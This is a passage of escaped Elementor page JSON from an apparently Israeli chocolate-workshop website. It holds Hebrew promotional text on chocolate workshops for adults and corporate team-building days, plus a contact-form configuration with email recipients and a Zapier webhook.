\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2 \\u05dc\\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05e9\\u05de\\u05d7.\\u00a0<\\/p><p>\\u00a0<\\/p><h2>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7\\u05d5\\u05ea<\\/h2><p>\\u05de\\u05d9 \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05e0\\u05d4\\u05e0\\u05d4 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05e2\\u05e9\\u05d5\\u05d9\\u05d9\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d5 \\u05de\\u05e9\\u05dc\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8\\u05ea, \\u05d5\\u05de\\u05d9 \\u05e9\\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d1\\u05d9\\u05df \\u05d5\\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05d5\\u05d3 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05d0\\u05d9\\u05da \\u05dc\\u05d4\\u05ea\\u05e2\\u05e1\\u05e7 \\u05e2\\u05dd \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4, \\u05d5\\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05d8\\u05d1, \\u05d9\\u05db\\u05d5\\u05dc \\u05d1\\u05d4\\u05d7\\u05dc\\u05d8 \\u05dc\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05e9\\u05ea\\u05ea\\u05e4\\u05d5\\u05ea \\u05d1\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05d5\\u05ea. \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd, \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1\\u05d9\\u05dd, \\u05d8\\u05d1\\u05dc\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05de\\u05e9\\u05dc\\u05d1\\u05d5\\u05ea \\u05d8\\u05e2\\u05de\\u05d9\\u05dd \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d9\\u05dd \\u05d5\\u05e2\\u05d5\\u05d3 \\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05d0\\u05d9\\u05da \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d8\\u05d5\\u05d1\\u05d4, \\u05d0\\u05d9\\u05da \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d5\\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05de\\u05de\\u05e0\\u05d5 \\u05e6\\u05d5\\u05e8\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea, \\u05d5\\u05d0\\u05d9\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd \\u05e9\\u05dc\\u05d5 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a8615cd\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\",\"padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2eebf0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"12b4f5ff\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":44,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2cfe4ee\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"25\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"field_9bd40f7\",\"field_type\":\"select\",\"required\":\"true\",\"field_label\":\"\\u05d0\\u05d6\\u05d5\\u05e8 \\u05d1\\u05d0\\u05e8\\u05e5\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"field_options\":\"\\u05de\\u05e8\\u05db\\u05d6\\n\\u05e6\\u05e4\\u05d5\\u05df\\n\\u05d3\\u05e8\\u05d5\\u05dd\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\",\"_id\":\"9bd40f7\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"25\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"submit_actions\":[\"email\",\"redirect\",\"webhook\"],\"redirect_to\":\"https:\\/\\/www.chocolate4u.co.il\\/thanks\\/\",\"webhooks\":\"https:\\/\\/hooks.zapier.com\\/hooks\\/catch\\/2852444\\/osyxhok\\/\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"61e9eaa4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"51c3427b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4c125717\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d4\\u05e0\\u05d4<\\/h2><p>\\u05db\\u05dc \\u05de\\u05d9 \\u05e9\\u05de\\u05e2\\u05d5\\u05e0\\u05d9\\u05d9\\u05df \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d6\\u05d0\\u05ea. \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05d1\\u05d4\\u05d1\\u05e0\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7, \\u05d1\\u05ea\\u05e2\\u05d5\\u05d3\\u05ea \\u05e7\\u05d5\\u05e0\\u05d3\\u05d9\\u05d8\\u05d5\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e0\\u05d9\\u05e1\\u05d9\\u05d5\\u05df \\u05de\\u05e9\\u05d5\\u05dd \\u05e1\\u05d5\\u05d2, \\u05e8\\u05e7 \\u05e8\\u05e6\\u05d5\\u05df \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05d5\\u05dc\\u05d4\\u05ea\\u05e0\\u05e1\\u05d5\\u05ea. \\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e4\\u05e9\\u05d8\\u05d4 \\u05d5\\u05e7\\u05dc\\u05d9\\u05dc\\u05d4, \\u05e2\\u05dd \\u05d4\\u05e1\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d0\\u05d5\\u05d3 \\u05d1\\u05e8\\u05d5\\u05e8\\u05d9\\u05dd \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05e9\\u05db\\u05d5\\u05dc\\u05dd \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e6\\u05d0\\u05ea \\u05e2\\u05dd \\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d5\\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05d9\\u05dd. \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d1\\u05d9\\u05ea\\u05d9\\u05ea \\u05d8\\u05d5\\u05d1\\u05d4 \\u05e2\\u05d5\\u05e9\\u05d4 \\u05e9\\u05d9\\u05de\\u05d5\\u05e9 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d1\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d2\\u05dc\\u05dd \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9\\u05d9\\u05dd \\u05d1\\u05dc\\u05d1\\u05d3, \\u05db\\u05d0\\u05e9\\u05e8 \\u05de\\u05d4\\u05e8 \\u05de\\u05d0\\u05d5\\u05d3 \\u05ea\\u05d2\\u05dc\\u05d5 \\u05e9\\u05d9\\u05e9 \\u05dc\\u05d4\\u05dd \\u05d4\\u05e9\\u05e4\\u05e2\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05d2\\u05d3\\u05d5\\u05dc\\u05d4 \\u05e2\\u05dc \\u05d8\\u05d9\\u05d1 \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d5\\u05e2\\u05dc \\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05d3\\u05e0\\u05d4 \\u05db\\u05d6\\u05d5 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05dc\\u05d9\\u05de\\u05d9 \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea, \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05d5\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea, \\u05dc\\u05d7\\u05d2\\u05d9\\u05d2\\u05d5\\u05ea \\u05d9\\u05d5\\u05dd \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05d4\\u05e6\\u05e2\\u05ea \\u05e0\\u05d9\\u05e9\\u05d5\\u05d0\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea, \\u05d5\\u05d2\\u05dd \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd.<\\/p><p>\\u00a0<\\/p><h2>\\u05e7\\u05e6\\u05ea \\u05de\\u05d9\\u05d3\\u05e2 \\u05e2\\u05dc \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd<\\/h2><p>\\u05db\\u05d0\\u05de\\u05d5\\u05e8, \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05d3\\u05e8\\u05da \\u05de\\u05e6\\u05d5\\u05d9\\u05e0\\u05ea \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e2\\u05dc \\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4. \\u05d1\\u05db\\u05dc \\u05e1\\u05d3\\u05e0\\u05d4 \\u05db\\u05dc\\u05dc \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05de\\u05db\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd, \\u05d5\\u05d9\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05e2\\u05dd \\u05e7\\u05d5\\u05e4\\u05e1\\u05d0 \\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05d5\\u05d7\\u05d5\\u05d1\\u05e8\\u05ea \\u05de\\u05ea\\u05db\\u05d5\\u05e0\\u05d9\\u05dd \\u05de\\u05de\\u05e0\\u05d4 \\u05d9\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d8\\u05e2\\u05d9\\u05de\\u05d9\\u05dd \\u05d2\\u05dd \\u05dc\\u05de\\u05e9\\u05e4\\u05d7\\u05d4 \\u05d5\\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd. \\u05d0\\u05ea \\u05db\\u05dc \\u05d0\\u05d7\\u05d3 \\u05de\\u05d4\\u05ea\\u05d5\\u05e6\\u05e8\\u05d9\\u05dd \\u05e9\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05e0\\u05d9\\u05ea\\u05df \\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05de\\u05dc\\u05d0 \\u05d5\\u05d1\\u05e7\\u05dc\\u05d5\\u05ea \\u05d2\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea. \\u05de\\u05d4\\u05e8 \\u05de\\u05d0\\u05d5\\u05d3 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05d4\\u05e9\\u05d5\\u05d5\\u05d9\\u05e5 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05db\\u05dc \\u05d4\\u05d6\\u05d3\\u05de\\u05e0\\u05d5\\u05ea, \\u05d5\\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05db\\u05d5\\u05dc\\u05dd \\u05dc\\u05dc\\u05e7\\u05e7 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e6\\u05d1\\u05e2\\u05d5\\u05ea.<\\/p><p>\\u00a0<\\/p><h2>\\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05de\\u05e6\\u05e2\\u05d5\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3<\\/h2><p>\\u05de\\u05e0\\u05d4\\u05dc\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d5\\u05e6\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05de\\u05ea\\u05dc\\u05d1\\u05d8\\u05d9\\u05dd \\u05d5\\u05de\\u05ea\\u05d7\\u05d1\\u05d8\\u05d9\\u05dd \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05d9\\u05d5\\u05ea \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05e4\\u05e9\\u05e8\\u05d9\\u05d5\\u05ea \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd. \\u05d0\\u05d9\\u05df \\u05e1\\u05e4\\u05e7 \\u05e9\\u05d1\\u05e2\\u05dc\\u05d9 \\u05e2\\u05e1\\u05e7\\u05d9\\u05dd \\u05e8\\u05d1\\u05d9\\u05dd \\u05de\\u05d1\\u05d9\\u05e0\\u05d9\\u05dd \\u05e9\\u05e9\\u05de\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dc \\u05d4\\u05de\\u05d5\\u05e8\\u05dc \\u05e9\\u05dc \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d5\\u05e2\\u05dc \\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05d7\\u05e9\\u05d5\\u05d1\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d4\\u05e6\\u05dc\\u05d7\\u05ea \\u05d4\\u05e2\\u05e1\\u05e7. \\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05e8\\u05d2\\u05d9\\u05e9\\u05d9\\u05dd \\u05de\\u05d5\\u05e2\\u05e8\\u05db\\u05d9\\u05dd \\u05d9\\u05d3\\u05e2\\u05d5 \\u05dc\\u05ea\\u05ea \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05d8\\u05d1 \\u05d5\\u05dc\\u05e4\\u05e2\\u05d5\\u05dc \\u05dc\\u05de\\u05e2\\u05df \\u05d4\\u05de\\u05d8\\u05e8\\u05d5\\u05ea \\u05d4\\u05e2\\u05e1\\u05e7\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05d5\\u05ea\\u05e4\\u05d5\\u05ea. \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d0\\u05d5 \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d4\\u05d9\\u05d0 \\u05d3\\u05e8\\u05da \\u05de\\u05e6\\u05d5\\u05d9\\u05e0\\u05ea \\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05d6\\u05d0\\u05ea. \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05e8\\u05d0\\u05d5\\u05ea \\u05e1\\u05e8\\u05d8 \\u05d0\\u05d5 \\u05dc\\u05e9\\u05de\\u05d5\\u05e2 \\u05d4\\u05e8\\u05e6\\u05d0\\u05d4 \\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05ea \\u05d4\\u05e9\\u05e8\\u05d0\\u05d4, \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05d4\\u05d6\\u05de\\u05d9\\u05df \\u05de\\u05e7\\u05d5\\u05dd \\u05d1\\u05de\\u05e1\\u05e2\\u05d3\\u05d4 \\u05d8\\u05d5\\u05d1\\u05d4, \\u05d5\\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05d2\\u05dd \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8, \\u05d5\\u05dc\\u05e2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d4\\u05dd \\u05d9\\u05d5\\u05dd \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d1\\u05d0\\u05de\\u05e6\\u05e2\\u05d5\\u05ea \\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d0\\u05d9\\u05df \\u05e1\\u05e4\\u05e7 \\u05e9\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9\\u05ea \\u05db\\u05de\\u05d5 \\u05d6\\u05d5 \\u05dc\\u05d0 \\u05ea\\u05de\\u05e6\\u05d0\\u05d5 \\u05d1\\u05db\\u05dc \\u05de\\u05e7\\u05d5\\u05dd.<\\/p><p>\\u00a0<\\/p><h3>\\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9 \\u05d5\\u05de\\u05d4\\u05e0\\u05d4<\\/h3><p>\\u05dc\\u05e8\\u05d5\\u05d1 \\u05e2\\u05e8\\u05d1 \\u05d2\\u05d9\\u05d1\\u05d5\\u05e9 \\u05dc\\u05e2\\u05d5\\u05d1\\u05d3\\u05d9\\u05dd \\u05d0\\u05d5 \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05e9\\u05db\\u05d6\\u05d4 \\u05d9\\u05ea\\u05e7\\u05d9\\u05d9\\u05dd \\u05d1\\u05ea\\u05d7\\u05d9\\u05dc\\u05ea \\u05d4\\u05e9\\u05e0\\u05d4 \\u05d4\\u05dc\\u05d5\\u05e2\\u05d6\\u05d9\\u05ea \\u05d4\\u05d7\\u05d3\\u05e9\\u05d4, \\u05d0\\u05d7\\u05e8\\u05d9 \\u05ea\\u05e7\\u05d5\\u05e4\\u05d4 \\u05d0\\u05e8\\u05d5\\u05db\\u05d4 \\u05e9\\u05dc \\u05e1\\u05e4\\u05d9\\u05e8\\u05ea \\u05de\\u05dc\\u05d0\\u05d9 \\u05d5\\u05e1\\u05d2\\u05d9\\u05e8\\u05d5\\u05ea \\u05e9\\u05d5\\u05e0\\u05d5\\u05ea \\u05d1\\u05e2\\u05e1\\u05e7 \\u05dc\\u05e7\\u05e8\\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d4 \\u05d4\\u05d7\\u05d3\\u05e9\\u05d4, \\u05d5\\u05d2\\u05dd \\u05db\\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05d9\\u05d9\\u05d7\\u05d5\\u05d3\\u05d9\\u05ea \\u05d5\\u05de\\u05d4\\u05e0\\u05d4 \\u05dc\\u05d7\\u05d2 \\u05d4\\u05e4\\u05e1\\u05d7, \\u05d7\\u05d2 \\u05d4\\u05d7\\u05e0\\u05d5\\u05db\\u05d4, \\u05e4\\u05d5\\u05e8\\u05d9\\u05dd \\u05d0\\u05d5 \\u05d0\\u05e4\\u05d9\\u05dc\\u05d5 \\u05dc\\u05e8\\u05d0\\u05e9 \\u05d4\\u05e9\\u05e0\\u05d4. \\u05d4\\u05d9\\u05ea\\u05e8\\u05d5\\u05df \\u05d4\\u05d2\\u05d3\\u05d5\\u05dc \\u05e9\\u05dc \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05df \\u05d4\\u05e1\\u05d5\\u05d2 \\u05d4\\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 